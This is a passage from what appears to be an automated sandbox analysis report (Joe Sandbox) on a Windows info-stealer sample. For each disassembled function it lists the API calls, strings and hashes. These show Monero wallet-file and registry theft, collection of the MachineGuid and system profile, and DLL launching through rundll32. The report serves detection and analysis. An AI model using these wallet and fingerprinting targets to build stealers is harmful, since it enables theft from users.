                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrcat$File$AllocCreateHeaplstrlen$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                        • String ID: .keys$\Monero\wallet.keys
                                                                                                        • API String ID: 3529164666-3586502688
                                                                                                        • Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                        • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                                                        • Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                        • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                                                        Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00411607
                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                        • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CharOpenQueryValue_memset
                                                                                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                        • API String ID: 2355623204-1211650757
                                                                                                        • Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                        • Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
                                                                                                        • Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                        • Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14
                                                                                                        Function 00401A51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35memoryregistryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                        • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                        Strings
                                                                                                        • wallet_path, xrefs: 00401A9C
                                                                                                        • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                        • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                        • API String ID: 3676486918-4244082812
                                                                                                        • Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                        • Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
                                                                                                        • Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                        • Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24
                                                                                                        Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                        • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                        • _wtoi64.MSVCRT ref: 004117C1
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                        • String ID:
                                                                                                        • API String ID: 181426013-0
                                                                                                        • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                        • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                                                        • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                        • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                                                        Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                        • _memset.LIBCMT ref: 004010D0
                                                                                                        • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                        • ExitProcess.KERNEL32 ref: 00401112
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1859398019-0
                                                                                                        • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                        • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
                                                                                                        • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                        • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
                                                                                                        Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00412B84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                        • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                        • API String ID: 2215929589-2108736111
                                                                                                        • Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                        • Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
                                                                                                        • Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                        • Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98
                                                                                                        Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 004116CE
                                                                                                          • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                          • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                        • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                        • String ID: Unknown
                                                                                                        • API String ID: 2781187439-1654365787
                                                                                                        • Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                        • Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
                                                                                                        • Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                        • Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58
                                                                                                        Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                        • wsprintfA.USER32 ref: 0041117A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                        • String ID: %d MB
                                                                                                        • API String ID: 3644086013-2651807785
                                                                                                        • Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                        • Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
                                                                                                        • Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                        • Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759
                                                                                                        Function 00410B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                        • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                        • String ID: Windows 11
                                                                                                        • API String ID: 3676486918-2517555085
                                                                                                        • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                        • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                                                        • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                        • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                                                        Function 00410BA9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memoryregistryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                        • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
